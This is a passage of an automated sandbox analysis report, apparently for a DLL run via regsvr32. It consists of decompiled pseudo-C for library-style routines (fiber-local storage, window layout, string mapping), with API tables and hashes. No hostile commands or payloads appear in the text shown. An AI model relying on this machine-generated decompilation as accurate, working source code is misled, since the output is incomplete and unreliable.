								 *(_t32 + 4) =  *(_t32 + 4) | 0xffffffff;
								 *_t32 = _t12;
								_t9 = 1;
							}
						}
					}
					return _t9;
				} else {
					E1001516D();
					return 0;
				}
			}














                                                                                                            0x1001538b
                                                                                                            0x10015395
                                                                                                            0x100153a2
                                                                                                            0x100153a4
                                                                                                            0x100153a6
                                                                                                            0x100153a8
                                                                                                            0x100153bc
                                                                                                            0x100153c9
                                                                                                            0x100153d6
                                                                                                            0x100153db
                                                                                                            0x100153dd
                                                                                                            0x100153e4
                                                                                                            0x100153e9
                                                                                                            0x100153f0
                                                                                                            0x100153fa
                                                                                                            0x10015404
                                                                                                            0x1001540e
                                                                                                            0x1001540e
                                                                                                            0x100153e9
                                                                                                            0x10015418
                                                                                                            0x1001541e
                                                                                                            0x10015421
                                                                                                            0x10015426
                                                                                                            0x10015469
                                                                                                            0x10015469
                                                                                                            0x1001546e
                                                                                                            0x1001546e
                                                                                                            0x10015428
                                                                                                            0x1001542a
                                                                                                            0x10015430
                                                                                                            0x10015436
                                                                                                            0x10015438
                                                                                                            0x1001543c
                                                                                                            0x00000000
                                                                                                            0x1001543e
                                                                                                            0x10015445
                                                                                                            0x1001544b
                                                                                                            0x1001544d
                                                                                                            0x00000000
                                                                                                            0x1001544f
                                                                                                            0x1001544f
                                                                                                            0x10015456
                                                                                                            0x10015459
                                                                                                            0x1001545f
                                                                                                            0x10015463
                                                                                                            0x10015465
                                                                                                            0x10015465
                                                                                                            0x1001544d
                                                                                                            0x1001543c
                                                                                                            0x10015472
                                                                                                            0x1001538d
                                                                                                            0x1001538d
                                                                                                            0x10015394
                                                                                                            0x10015394

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,10011225,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001539C
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 100153B4
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 100153C1
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 100153CE
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 100153DB
                                                                                                            • FlsAlloc.KERNEL32(Function_0001520E,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015418
                                                                                                            • FlsSetValue.KERNEL32(00000000,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015445
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10015459
                                                                                                              • Part of subcall function 1001516D: FlsFree.KERNEL32(FFFFFFFF,100112B4,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015178
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                                                            • API String ID: 2355849793-282957996
                                                                                                            • Opcode ID: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                                                            • Instruction ID: 40006df79962a22775231557979cac449e3f6d5e877b76d204bcc213d6c27e9e
                                                                                                            • Opcode Fuzzy Hash: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                                                            • Instruction Fuzzy Hash: D821CF78901A65DFE321CF7A9D88A673FE0EB42692718412EF910CF260EB71C480CF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002D2D6 Relevance: 21.4, APIs: 14, Instructions: 397COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E1002D2D6(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v8;
				int _v12;
				int _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				int _v48;
				void* _v52;
				struct tagRECT _v68;
				struct tagRECT _v84;
				struct tagRECT _v100;
				struct HDWP__* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t188;
				signed int _t190;
				signed int _t192;
				intOrPtr* _t198;
				intOrPtr _t206;
				int _t208;
				signed int _t210;
				signed int _t211;
				signed int _t214;
				signed int _t215;
				signed int _t221;
				void* _t225;
				intOrPtr _t233;
				intOrPtr _t234;
				int _t243;
				signed int _t251;
				signed int _t256;
				long _t263;
				intOrPtr _t264;
				int _t273;
				signed int _t280;
				signed int _t287;
				intOrPtr* _t297;
				intOrPtr _t302;
				signed int _t310;
				signed int _t312;
				intOrPtr _t319;
				signed int _t325;
				intOrPtr _t326;
				signed int _t329;
				int _t334;
				intOrPtr* _t341;

				_t297 = __ecx;
				E1002F49A( &_v28, _a8, _a12);
				if(IsRectEmpty(_t297 + 0xac) != 0) {
					GetClientRect( *(E10022A96(_t297) + 0x1c),  &_v84);
					_t188 = _v84.right - _v84.left;
					_t302 = _v84.bottom - _v84.top;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_t297 + 0x13c))( &_v68, _a12);
					_t188 = _v68.right - _v68.left;
					_t302 = _v68.bottom - _v68.top;
				}
				_t334 = 0;
				_v44 = _t188;
				_v40 = _t302;
				if( *((intOrPtr*)(_t297 + 0xa8)) == 0) {
					_v132 = BeginDeferWindowPos( *(_t297 + 0x9c));
				} else {
					_v132 = 0;
				}
				_t190 =  *0x1004efa0; // 0x2
				_v36 =  ~_t190;
				_t192 =  *0x1004efa4; // 0x2
				_v32 =  ~_t192;
				_v16 = _t334;
				_v12 = _t334;
				_v8 = _t334;
				if( *(_t297 + 0x9c) <= _t334) {
					L72:
					if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && _v132 != _t334) {
						EndDeferWindowPos(_v132);
					}
					SetRectEmpty( &_v100);
					 *((intOrPtr*)( *_t297 + 0x13c))( &_v100, _a12);
					if(_a8 == _t334 || _a12 == _t334) {
						if(_v28 != _t334) {
							_v28 = _v28 + _v100.left - _v100.right;
						}
					}
					if(_a8 == _t334 || _a12 != _t334) {
						if(_v24 != _t334) {
							_v24 = _v24 + _v100.top - _v100.bottom;
						}
					}
					_t198 = _a4;
					 *_t198 = _v28;
					 *((intOrPtr*)(_t198 + 4)) = _v24;
					return _t198;
				} else {
					do {
						_t341 = E1002CE0B(_t297, _v8);
						_v20 = _t341;
						_t206 =  *((intOrPtr*)(E100086F2(_t297 + 0x94, _v8)));
						if(_t341 == _t334) {
							if(_t206 != _t334) {
								goto L71;
							}
							L58:
							_t208 = _v16;
							if(_t208 != _t334) {
								if(_a12 == _t334) {
									_t310 = _v36 + _t208 -  *0x1004efa0;
									_v36 = _t310;
									if(_v28 <= _t310) {
										_v28 = _t310;
									}
									_t210 = _v32;
									if(_v24 <= _t210) {
										_v24 = _t210;
									}
									_t211 =  *0x1004efa4; // 0x2
									_v32 =  ~_t211;
								} else {
									_t312 = _v32 + _t208 -  *0x1004efa4;
									_t214 = _v36;
									_v32 = _t312;
									if(_v28 <= _t214) {
										_v28 = _t214;
									}
									if(_v24 <= _t312) {
										_v24 = _t312;
									}
									_t215 =  *0x1004efa0; // 0x2
									_v36 =  ~_t215;
								}
								_v16 = _t334;
							}
							goto L71;
						}
						if( *((intOrPtr*)( *_t341 + 0x150))() == 0) {
							L51:
							if(_v12 != _t334) {
								goto L71;
							}
							L52:
							 *((intOrPtr*)( *_t341 + 0x154))( &_v132);
							goto L71;
						}
						_t221 =  *(_t341 + 0x7c);
						if((_t221 & 0x00000004) == 0 || (_t221 & 0x00000001) == 0) {
							asm("sbb eax, eax");
							_t225 = ( ~(_t221 & 0x0000a000) & 0xfffffffa) + 0x10;
						} else {
							_t225 = 6;
						}
						 *((intOrPtr*)( *_t341 + 0x134))( &_v52, 0xffffffff, _t225);
						E100086B2( &_v68, _v36, _v32, _v52, _v48);
						GetWindowRect( *(_t341 + 0x1c),  &_v84);
						E10028E5A(_t297,  &_v84);
						if(_a12 == _t334) {
							_t233 = _v84.top;
							if(_t233 > _v68.top &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								OffsetRect( &_v68, _t334, _t233 - _v68.top);
							}
							_t234 = _v68.bottom;
							_t319 = _v40;
							if(_t234 > _t319 &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								_t325 = _t319 - _t234 - _v68.top -  *0x1004efa4;
								_t256 = _v32;
								if(_t325 > _t256) {
									_t256 = _t325;
								}
								OffsetRect( &_v68, _t334, _t256 - _v68.top);
							}
							if(_v12 == _t334) {
								if(_v68.top < _v40 -  *0x1004efa4) {
									goto L44;
								}
								_t247 = _v8;
								if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t247 - 1))) == _t334) {
									goto L44;
								} else {
									goto L56;
								}
							} else {
								_t251 =  *0x1004efa4; // 0x2
								_v12 = _t334;
								OffsetRect( &_v68, _t334,  ~(_v68.top + _t251));
								L44:
								if(EqualRect( &_v68,  &_v84) == 0) {
									if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t341 = _v20;
										_t334 = 0;
									}
									E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
								}
								_v32 = _v68.top -  *0x1004efa4 + _v48;
								_t243 = _v52;
								if(_v16 > _t243) {
									goto L52;
								} else {
									_v16 = _t243;
									goto L51;
								}
							}
						} else {
							_t263 = _v84.left;
							if(_t263 > _v68.left &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
								OffsetRect( &_v68, _t263 - _v68.left, _t334);
							}
							_t264 = _v68.right;
							_t326 = _v44;
							if(_t264 <= _t326 ||  *((intOrPtr*)(_t297 + 0x90)) != _t334) {
								L22:
								if(_v12 == _t334) {
									if(_v68.left < _v44 -  *0x1004efa0) {
										L27:
										if(EqualRect( &_v68,  &_v84) == 0) {
											if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t341 = _v20;
												_t334 = 0;
											}
											E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
										}
										_v36 = _v52 -  *0x1004efa0 + _v68.left;
										_t273 = _v48;
										if(_v16 <= _t273) {
											_v16 = _t273;
										}
										goto L52;
									}
									_t277 = _v8;
									if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t277 - 1))) == _t334) {
										goto L27;
									} else {
										L56:
										E1001E2F0(_t297, _t297 + 0x94, _t334, 1, _v8, _t334, 1);
										_v12 = 1;
										goto L58;
									}
								}
								_t280 =  *0x1004efa0; // 0x2
								_v12 = _t334;
								OffsetRect( &_v68,  ~(_t280 + _v68.left), _t334);
								goto L27;
							} else {
								_t329 = _t326 - _t264 -  *0x1004efa0 - _v68.left;
								_t287 = _v36;
								if(_t329 > _t287) {
									_t287 = _t329;
								}
								OffsetRect( &_v68, _t287 - _v68.left, _t334);
								goto L22;
							}
						}
						L71:
						_v8 = _v8 + 1;
					} while (_v8 <  *(_t297 + 0x9c));
					goto L72;
				}
			}























































                                                                                                            0x1002d2eb
                                                                                                            0x1002d2ee
                                                                                                            0x1002d302
                                                                                                            0x1002d338
                                                                                                            0x1002d344
                                                                                                            0x1002d347
                                                                                                            0x1002d304
                                                                                                            0x1002d30c
                                                                                                            0x1002d30d
                                                                                                            0x1002d30e
                                                                                                            0x1002d315
                                                                                                            0x1002d316
                                                                                                            0x1002d322
                                                                                                            0x1002d325
                                                                                                            0x1002d325
                                                                                                            0x1002d34a
                                                                                                            0x1002d352
                                                                                                            0x1002d355
                                                                                                            0x1002d358
                                                                                                            0x1002d36b
                                                                                                            0x1002d35a
                                                                                                            0x1002d35a
                                                                                                            0x1002d35a
                                                                                                            0x1002d36e
                                                                                                            0x1002d375
                                                                                                            0x1002d378
                                                                                                            0x1002d385
                                                                                                            0x1002d388
                                                                                                            0x1002d38b
                                                                                                            0x1002d38e
                                                                                                            0x1002d391
                                                                                                            0x1002d6fd
                                                                                                            0x1002d703
                                                                                                            0x1002d70d
                                                                                                            0x1002d70d
                                                                                                            0x1002d717
                                                                                                            0x1002d728
                                                                                                            0x1002d731
                                                                                                            0x1002d73b
                                                                                                            0x1002d743
                                                                                                            0x1002d743
                                                                                                            0x1002d73b
                                                                                                            0x1002d749
                                                                                                            0x1002d753
                                                                                                            0x1002d75b
                                                                                                            0x1002d75b
                                                                                                            0x1002d753
                                                                                                            0x1002d75e
                                                                                                            0x1002d765
                                                                                                            0x1002d76b
                                                                                                            0x1002d770
                                                                                                            0x1002d397
                                                                                                            0x1002d397
                                                                                                            0x1002d3a4
                                                                                                            0x1002d3ac
                                                                                                            0x1002d3b6
                                                                                                            0x1002d3b8
                                                                                                            0x1002d682
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002d684
                                                                                                            0x1002d684
                                                                                                            0x1002d689
                                                                                                            0x1002d68e
                                                                                                            0x1002d6c6
                                                                                                            0x1002d6cb
                                                                                                            0x1002d6ce
                                                                                                            0x1002d6d0
                                                                                                            0x1002d6d0
                                                                                                            0x1002d6d3
                                                                                                            0x1002d6d9
                                                                                                            0x1002d6db
                                                                                                            0x1002d6db
                                                                                                            0x1002d6de
                                                                                                            0x1002d6e5
                                                                                                            0x1002d690
                                                                                                            0x1002d699
                                                                                                            0x1002d69b
                                                                                                            0x1002d6a1
                                                                                                            0x1002d6a4
                                                                                                            0x1002d6a6
                                                                                                            0x1002d6a6
                                                                                                            0x1002d6ac
                                                                                                            0x1002d6ae
                                                                                                            0x1002d6ae
                                                                                                            0x1002d6b1
                                                                                                            0x1002d6b8
                                                                                                            0x1002d6b8
                                                                                                            0x1002d6e8
                                                                                                            0x1002d6e8
                                                                                                            0x00000000
                                                                                                            0x1002d689
                                                                                                            0x1002d3ca
                                                                                                            0x1002d61a
                                                                                                            0x1002d61d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002d623
                                                                                                            0x1002d62b
                                                                                                            0x00000000
                                                                                                            0x1002d62b
                                                                                                            0x1002d3d0
                                                                                                            0x1002d3d5
                                                                                                            0x1002d3e7
                                                                                                            0x1002d3ec
                                                                                                            0x1002d3db
                                                                                                            0x1002d3dd
                                                                                                            0x1002d3dd
                                                                                                            0x1002d3fa
                                                                                                            0x1002d40f
                                                                                                            0x1002d41b
                                                                                                            0x1002d427
                                                                                                            0x1002d42f
                                                                                                            0x1002d540
                                                                                                            0x1002d546
                                                                                                            0x1002d559
                                                                                                            0x1002d559
                                                                                                            0x1002d55f
                                                                                                            0x1002d562
                                                                                                            0x1002d567
                                                                                                            0x1002d57a
                                                                                                            0x1002d57c
                                                                                                            0x1002d581
                                                                                                            0x1002d583
                                                                                                            0x1002d583
                                                                                                            0x1002d58e
                                                                                                            0x1002d58e
                                                                                                            0x1002d597
                                                                                                            0x1002d642
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002d648
                                                                                                            0x1002d64d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002d59d
                                                                                                            0x1002d59d
                                                                                                            0x1002d5af
                                                                                                            0x1002d5b2
                                                                                                            0x1002d5b8
                                                                                                            0x1002d5c8
                                                                                                            0x1002d5d0
                                                                                                            0x1002d5e7
                                                                                                            0x1002d5e8
                                                                                                            0x1002d5e9
                                                                                                            0x1002d5ea
                                                                                                            0x1002d5eb
                                                                                                            0x1002d5ee
                                                                                                            0x1002d5ee
                                                                                                            0x1002d5fb
                                                                                                            0x1002d5fb
                                                                                                            0x1002d60c
                                                                                                            0x1002d60f
                                                                                                            0x1002d615
                                                                                                            0x00000000
                                                                                                            0x1002d617
                                                                                                            0x1002d617
                                                                                                            0x00000000
                                                                                                            0x1002d617
                                                                                                            0x1002d615
                                                                                                            0x1002d435
                                                                                                            0x1002d435
                                                                                                            0x1002d43b
                                                                                                            0x1002d44e
                                                                                                            0x1002d44e
                                                                                                            0x1002d454
                                                                                                            0x1002d457
                                                                                                            0x1002d45c
                                                                                                            0x1002d489
                                                                                                            0x1002d48c
                                                                                                            0x1002d4b7
                                                                                                            0x1002d4d5
                                                                                                            0x1002d4e5
                                                                                                            0x1002d4ed
                                                                                                            0x1002d504
                                                                                                            0x1002d505
                                                                                                            0x1002d506
                                                                                                            0x1002d507
                                                                                                            0x1002d508
                                                                                                            0x1002d50b
                                                                                                            0x1002d50b
                                                                                                            0x1002d518
                                                                                                            0x1002d518
                                                                                                            0x1002d529
                                                                                                            0x1002d52c
                                                                                                            0x1002d532
                                                                                                            0x1002d538
                                                                                                            0x1002d538
                                                                                                            0x00000000
                                                                                                            0x1002d532
                                                                                                            0x1002d4b9
                                                                                                            0x1002d4be
                                                                                                            0x00000000
                                                                                                            0x1002d668
                                                                                                            0x1002d668
                                                                                                            0x1002d676
                                                                                                            0x1002d67b
                                                                                                            0x00000000
                                                                                                            0x1002d67b
                                                                                                            0x1002d4be
                                                                                                            0x1002d48e
                                                                                                            0x1002d4a0
                                                                                                            0x1002d4a3
                                                                                                            0x00000000
                                                                                                            0x1002d466
                                                                                                            0x1002d46f
                                                                                                            0x1002d471
                                                                                                            0x1002d476
                                                                                                            0x1002d478
                                                                                                            0x1002d478
                                                                                                            0x1002d483
                                                                                                            0x00000000
                                                                                                            0x1002d483
                                                                                                            0x1002d45c
                                                                                                            0x1002d6eb
                                                                                                            0x1002d6eb
                                                                                                            0x1002d6f1
                                                                                                            0x00000000
                                                                                                            0x1002d397

                                                                                                            APIs
                                                                                                            • IsRectEmpty.USER32 ref: 1002D2FA
                                                                                                            • GetClientRect.USER32 ref: 1002D338
                                                                                                            • BeginDeferWindowPos.USER32 ref: 1002D365
                                                                                                            • GetWindowRect.USER32 ref: 1002D41B
                                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 1002D44E
                                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 1002D483
                                                                                                            • OffsetRect.USER32(?,00000002,00000000), ref: 1002D4A3
                                                                                                            • EqualRect.USER32 ref: 1002D4DD
                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 1002D559
                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 1002D58E
                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 1002D5B2
                                                                                                            • EqualRect.USER32 ref: 1002D5C0
                                                                                                            • EndDeferWindowPos.USER32(?), ref: 1002D70D
                                                                                                            • SetRectEmpty.USER32(?), ref: 1002D717
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
                                                                                                            • String ID:
                                                                                                            • API String ID: 3160784657-0
                                                                                                            • Opcode ID: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                                                            • Instruction ID: 3196aec78d80ec659258b0f525fbb29d57e8b94677c4b91abc4d73535c0add33
                                                                                                            • Opcode Fuzzy Hash: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                                                            • Instruction Fuzzy Hash: D5F1023190062ADFCF01DFA8E9889AEBBF5FF48340F54452AE809EB255D730AE45CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10018081 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 299COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E10018081(void* __ebx, void* __edi, int __esi, void* __eflags) {
				signed int _t119;
				intOrPtr _t120;
				int _t122;
				char* _t125;
				int _t132;
				signed int _t134;
				int _t137;
				int _t138;
				short* _t160;
				short* _t163;
				int _t164;
				signed int _t165;
				long _t169;
				signed int _t172;
				int _t181;
				char* _t183;
				int _t184;
				signed int _t186;
				int _t187;
				int _t190;
				void* _t192;
				short* _t193;
				char* _t195;
				char* _t196;
				signed int _t199;

				_t185 = __esi;
				_push(0x38);
				_push(0x10042708);
				E10012514(__ebx, __edi, __esi);
				_t199 =  *0x1004f73c; // 0x1
				if(_t199 == 0) {
					_t185 = 1;
					if(LCMapStringW(0, 0x100, 0x10042704, 1, 0, 0) == 0) {
						_t169 = GetLastError();
						__eflags = _t169 - 0x78;
						if(_t169 == 0x78) {
							 *0x1004f73c = 2;
						}
					} else {
						 *0x1004f73c = 1;
					}
				}
				if( *(_t192 + 0x14) <= 0) {
					L11:
					_t119 =  *0x1004f73c; // 0x1
					if(_t119 == 2 || _t119 == 0) {
						 *(_t192 - 0x28) = 0;
						_t183 = 0;
						 *(_t192 - 0x3c) = 0;
						__eflags =  *(_t192 + 8);
						if( *(_t192 + 8) == 0) {
							_t138 =  *0x1004f724; // 0x0
							 *(_t192 + 8) = _t138;
						}
						__eflags =  *(_t192 + 0x20);
						if( *(_t192 + 0x20) == 0) {
							_t137 =  *0x1004f734; // 0x0
							 *(_t192 + 0x20) = _t137;
						}
						_t120 = E1001A444(0,  *(_t192 + 8));
						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
						__eflags = _t120 - 0xffffffff;
						if(_t120 != 0xffffffff) {
							__eflags = _t120 -  *(_t192 + 0x20);
							if(__eflags == 0) {
								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
								L61:
								__eflags =  *(_t192 - 0x28);
								if(__eflags != 0) {
									_push( *(_t192 - 0x28));
									E100107C8(0, _t183, _t186, __eflags);
								}
								_t122 = _t186;
								goto L64;
							}
							_push(0);
							_push(0);
							_t175 = _t192 + 0x14;
							_push(_t192 + 0x14);
							_push( *(_t192 + 0x10));
							_push(_t120);
							_push( *(_t192 + 0x20));
							_t125 = E1001A487(0, _t183, _t185, __eflags);
							_t195 =  &(_t193[0xc]);
							 *(_t192 - 0x28) = _t125;
							__eflags = _t125;
							if(_t125 == 0) {
								goto L46;
							}
							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
							 *(_t192 - 0x24) = _t187;
							__eflags = _t187;
							if(_t187 == 0) {
								_t186 =  *(_t192 - 0x48);
								L58:
								__eflags =  *(_t192 - 0x3c);
								if(__eflags != 0) {
									_push(_t183);
									E100107C8(0, _t183, _t186, __eflags);
								}
								goto L61;
							}
							 *(_t192 - 4) = 0;
							E10010B20(_t126 + 0x00000003 & 0xfffffffc, _t175);
							 *(_t192 - 0x18) = _t195;
							_t183 = _t195;
							 *(_t192 - 0x44) = _t183;
							E10011C50(_t183, 0, _t187);
							_t196 =  &(_t195[0xc]);
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							__eflags = _t183;
							if(_t183 != 0) {
								L54:
								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
								 *(_t192 - 0x24) = _t132;
								__eflags = _t132;
								if(__eflags != 0) {
									_push( *(_t192 + 0x1c));
									_push( *(_t192 + 0x18));
									_push(_t192 - 0x24);
									_push(_t183);
									_push( *(_t192 + 0x20));
									_push( *((intOrPtr*)(_t192 - 0x40)));
									_t134 = E1001A487(0, _t183, _t187, __eflags);
									asm("sbb esi, esi");
									_t186 =  ~( ~_t134);
									goto L58;
								}
								goto L55;
							} else {
								_t183 = E100107B6( *(_t192 - 0x24));
								__eflags = _t183;
								if(_t183 == 0) {
									L55:
									_t186 = 0;
									goto L58;
								}
								E10011C50(_t183, 0,  *(_t192 - 0x24));
								_t196 =  &(_t196[0xc]);
								 *(_t192 - 0x3c) = 1;
								goto L54;
							}
						} else {
							goto L46;
						}
					} else {
						if(_t119 != 1) {
							L46:
							_t122 = 0;
							L64:
							return E1001254F(_t122);
						}
						_t184 = 0;
						 *(_t192 - 0x2c) = 0;
						 *(_t192 - 0x38) = 0;
						 *(_t192 - 0x34) = 0;
						if( *(_t192 + 0x20) == 0) {
							_t164 =  *0x1004f734; // 0x0
							 *(_t192 + 0x20) = _t164;
						}
						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
						 *(_t192 - 0x30) = _t190;
						if(_t190 == 0) {
							goto L46;
						} else {
							 *(_t192 - 4) = 1;
							E10010B20(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
							 *(_t192 - 0x18) = _t193;
							 *(_t192 - 0x1c) = _t193;
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							if( *(_t192 - 0x1c) != 0) {
								L21:
								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
									L36:
									_t219 =  *(_t192 - 0x34);
									if( *(_t192 - 0x34) != 0) {
										_push( *(_t192 - 0x20));
										E100107C8(0, _t184, _t190, _t219);
									}
									_t220 =  *(_t192 - 0x38);
									if( *(_t192 - 0x38) != 0) {
										_push( *(_t192 - 0x1c));
										E100107C8(0, _t184, _t190, _t220);
									}
									_t122 = _t184;
									goto L64;
								}
								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
								 *(_t192 - 0x2c) = _t184;
								if(_t184 == 0) {
									goto L36;
								}
								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
									 *(_t192 - 4) = 2;
									E10010B20(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
									 *(_t192 - 0x18) = _t193;
									 *(_t192 - 0x20) = _t193;
									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
									__eflags =  *(_t192 - 0x20);
									if( *(_t192 - 0x20) != 0) {
										L31:
										__eflags = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
										if(__eflags != 0) {
											_push(0);
											_push(0);
											__eflags =  *(_t192 + 0x1c);
											if(__eflags != 0) {
												_push( *(_t192 + 0x1c));
												_push( *(_t192 + 0x18));
											} else {
												_push(0);
												_push(0);
											}
											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
										}
										goto L36;
									} else {
										_t160 = E100107B6(_t184 + _t184);
										 *(_t192 - 0x20) = _t160;
										__eflags = _t160;
										if(__eflags == 0) {
											goto L36;
										}
										 *(_t192 - 0x34) = 1;
										goto L31;
									}
								}
								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
								}
								goto L36;
							} else {
								_t163 = E100107B6(_t190 + _t190);
								_pop(_t172);
								 *(_t192 - 0x1c) = _t163;
								if(_t163 == 0) {
									goto L46;
								}
								 *(_t192 - 0x38) = 1;
								goto L21;
							}
						}
					}
				}
				_t181 =  *(_t192 + 0x14);
				_t165 =  *(_t192 + 0x10);
				while(1) {
					_t172 = _t181 - 1;
					if( *_t165 == 0) {
						break;
					}
					_t165 = _t165 + 1;
					if(_t172 != 0) {
						continue;
					}
					_t172 = _t172 | 0xffffffff;
					break;
				}
				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
				goto L11;
			}




























                                                                                                            0x10018081
                                                                                                            0x10018081
                                                                                                            0x10018083
                                                                                                            0x10018088
                                                                                                            0x1001808f
                                                                                                            0x10018095
                                                                                                            0x1001809b
                                                                                                            0x100180b0
                                                                                                            0x100180ba
                                                                                                            0x100180c0
